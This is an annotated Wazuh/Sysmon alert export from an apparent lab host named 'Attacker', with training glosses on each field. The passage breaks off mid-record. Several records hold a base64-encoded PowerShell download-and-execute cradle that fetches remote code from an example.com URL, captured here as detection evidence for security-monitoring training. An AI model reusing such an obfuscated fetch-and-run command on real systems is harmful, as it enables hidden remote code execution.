data.win.system.systemTime:  2025-04-24T22:56:25.7711247Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350777
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:24.033 ProcessGuid: {94294ddc-c198-680a-f80c-000000000e00} ProcessId: 14476 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c193-680a-f60c-000000000e00} ParentProcessId: 1672 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:24.033
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c198-680a-f80c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14476
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c193-680a-f60c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  1672
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:28.678+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:28.678+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  132
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535388.2835603
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:26.0786930Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350778
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:26.056 ProcessGuid: {94294ddc-c198-680a-f80c-000000000e00} ProcessId: 14476 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_d23ja4vf.wy5.ps1 CreationUtcTime: 2025-04-24 22:56:26.056 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:26.056
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c198-680a-f80c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  14476
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_d23ja4vf.wy5.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:26.056
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Powershell.exe spawned a powershell process which executed a base64 encoded command

🧠 What happened? Powershell.exe spawned a powershell process which executed a base64 encoded command

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:31.172+0000 | 🧠 MITRE: ['Execution'] – ['PowerShell'] [T1059.001]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1059 – Command & Scripting Interpreter

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:31.172+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  12
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Powershell.exe spawned a powershell process which executed a base64 encoded command
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92057
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1059.001']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Execution']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['PowerShell']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  129
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid1_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535391.2838372
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  1
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  5
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  1
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:28.7132822Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350805
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "Process Create: RuleName: - UtcTime: 2025-04-24 22:56:27.432 ProcessGuid: {94294ddc-c19b-680a-fa0c-000000000e00} ProcessId: 13544 Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe FileVersion: 10.0.26100.3323 (WinBuild.160101.0800) Description: Windows PowerShell Product: Microsoft® Windows® Operating System Company: Microsoft Corporation OriginalFileName: PowerShell.EXE CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA CurrentDirectory: C:\Users\Attcker1\ User: Attacker\Attcker1 LogonGuid: {94294ddc-ea85-67fe-8465-020000000000} LogonId: 0x26584 TerminalSessionId: 1 IntegrityLevel: Medium Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC ParentProcessGuid: {94294ddc-c198-680a-f80c-000000000e00} ParentProcessId: 14476 ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA ParentUser: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:27.432
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c19b-680a-fa0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13544
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.fileVersion:  10.0.26100.3323 (WinBuild.160101.0800)
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.description:  Windows PowerShell
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.product:  Microsoft® Windows® Operating System
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.company:  Microsoft Corporation
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.originalFileName:  PowerShell.EXE
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.commandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.currentDirectory:  C:\\Users\\Attcker1\\
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonGuid:  {94294ddc-ea85-67fe-8465-020000000000}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.logonId:  0x26584
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.terminalSessionId:  1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.integrityLevel:  Medium
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.hashes:  SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessGuid:  {94294ddc-c198-680a-f80c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentProcessId:  14476
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentImage:  C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentCommandLine:  \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.parentUser:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Executable file dropped in folder commonly used by malware

🧠 What happened? Executable file dropped in folder commonly used by malware

🔍 Why it's important: Critical or commonly abused ATT&CK technique

🕒 2025-04-24T22:56:31.185+0000 | 🧠 MITRE: ['Command and Control'] – ['Ingress Tool Transfer'] [T1105]

🚨 Severity: High

🧪 Investigation Guidance

[High] T1105 – Ingress Tool Transfer

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:31.185+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  15
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Executable file dropped in folder commonly used by malware
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  92213
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1105']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Command and Control']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Ingress Tool Transfer']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  133
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  True
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['sysmon', 'sysmon_eid11_detections', 'windows']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535391.2846443
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Sysmon
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {5770385f-c22a-43e0-bf4c-06f5698ffbd9}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  11
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  2
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  4
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  11
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
Low‑level opcode number (start/stop). Only needed in deep forensics.

data.win.system.keywords:  0x8000000000000000
Bit‑flag keywords set by Windows – rarely critical but good for filtering.

data.win.system.systemTime:  2025-04-24T22:56:28.9848322Z
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventRecordID:  350806
Incremental log record number – handy for timeline order.

data.win.system.processID:  3712
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.threadID:  4740
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.channel:  Microsoft-Windows-Sysmon/Operational
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.computer:  Attacker
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.severityValue:  INFORMATION
TEXT severity (INFO, WARNING, ERROR).

data.win.system.message:  "File created: RuleName: - UtcTime: 2025-04-24 22:56:28.934 ProcessGuid: {94294ddc-c19b-680a-fa0c-000000000e00} ProcessId: 13544 Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_jugljtfi.vxn.ps1 CreationUtcTime: 2025-04-24 22:56:28.934 User: Attacker\Attcker1"
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.utcTime:  2025-04-24 22:56:28.934
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processGuid:  {94294ddc-c19b-680a-fa0c-000000000e00}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.processId:  13544
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.image:  C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.targetFilename:  C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_jugljtfi.vxn.ps1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.creationUtcTime:  2025-04-24 22:56:28.934
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.eventdata.user:  Attacker\\Attcker1
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

location:  EventChannel
Which log source produced the event (e.g., sysmon, auditd).

_severity_score:  9
Score 0‑10 our script assigns. 0‑4 = low noise, 5‑7 = check soon, 8‑10 = priority.

_severity_label:  High
High / Medium / Low as derived from the score & MITRE list.

_severity_reason:  Critical or commonly abused ATT&CK technique
Short human reason we chose that label.

🎯 Recommended Actions

Windows logon success.

🧠 What happened? Windows logon success.

🔍 Why it's important: Behaviour‑based score ≥ 6

🕒 2025-04-24T22:56:31.816+0000 | 🧠 MITRE: ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access'] – ['Valid Accounts'] [T1078]

🚨 Severity: Medium

🧪 Investigation Guidance

[Unknown] T1078 – Valid Accounts

🔍 Full Alert Details
timestamp:  2025-04-24T22:56:31.816+0000
When this log was created. The SOC timeline starts here – always line this up with other events.

rule.level:  3
Original Wazuh severity 0‑15. 0‑3 = info, 4‑7 = suspicious, 8+ = bad.

rule.description:  Windows logon success.
Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.

rule.id:  60106
Numeric ID of the detection rule that fired.

rule.mitre.id:  ['T1078']
List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.

rule.mitre.tactic:  ['Defense Evasion', 'Persistence', 'Privilege Escalation', 'Initial Access']
ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.

rule.mitre.technique:  ['Valid Accounts']
Specific technique name (e.g., PowerShell). Shows the HOW.

rule.firedtimes:  68
How many times this exact rule hit during aggregation. High = repetitive behaviour.

rule.mail:  False
True if the rule is configured to email someone – legacy but can warn you of high value detections.

rule.groups:  ['windows', 'windows_security', 'authentication_success']
Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.

rule.gdpr:  ['IV_32.2']
General Data Protection Regulation relevance.

rule.gpg13:  ['7.1', '7.2']
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

rule.hipaa:  ['164.312.b']
HIPAA mapping – healthcare data exposure.

rule.nist_800_53:  ['AC.7', 'AU.14']
NIST 800‑53 mapping – US Fed controls.

rule.pci_dss:  ['10.2.5']
PCI DSS mapping – card‑holder data rules.

rule.tsc:  ['CC6.8', 'CC7.2', 'CC7.3']
SOC‑2 Trust Services Criteria tag.

agent.id:  001
Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.

agent.name:  Attacker
Hostname of the source machine. Handy when matching with AD or your CMDB.

agent.ip:  192.168.6.131
The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.

manager.name:  server1
Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.

id:  1745535391.2849212
Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.

decoder.name:  windows_eventchannel
Name of the Wazuh decoder that parsed this raw log.

data.win.system.providerName:  Microsoft-Windows-Security-Auditing
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.providerGuid:  {54849625-5478-4994-a5ba-3e3b0328c30d}
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.eventID:  4624
Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!

data.win.system.version:  3
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.level:  0
No explanation yet – likely niche or custom. Treat like raw data until the team documents it.

data.win.system.task:  12544
Windows task category (Logon, Policy Change, etc.).

data.win.system.opcode:  0
